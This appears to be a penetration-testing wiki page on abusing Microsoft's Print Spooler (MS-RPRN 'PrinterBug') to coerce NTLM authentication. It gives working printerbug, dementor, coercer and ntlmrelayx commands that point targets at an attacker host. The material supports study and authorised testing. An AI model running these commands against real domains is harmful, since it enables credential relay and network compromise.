Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments (more info on the finding).

The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.

The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.

Practice

Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).

The spooler service can be triggered with printerbug or SpoolSample (C#). There are many alternatives available publicly on the Internet.

rpcdump.py $TARGET | grep -A 6 "spoolsv"

netexec smb <TARGET> -u <USER> -p <PASSWORD> -M spooler
netexec smb <TARGET> -u <USER> -p <PASSWORD> --local-auth -M spooler

.\SpoolerScan.ps1

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

python dementor.py -d $DOMAIN -u $USERNAME -p $PASSWORD $ATTACKER_IP $TARGET_IP

# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-RPRN -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx -l $ATTACKER_IP -t $TARGET_IP

ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'

Resources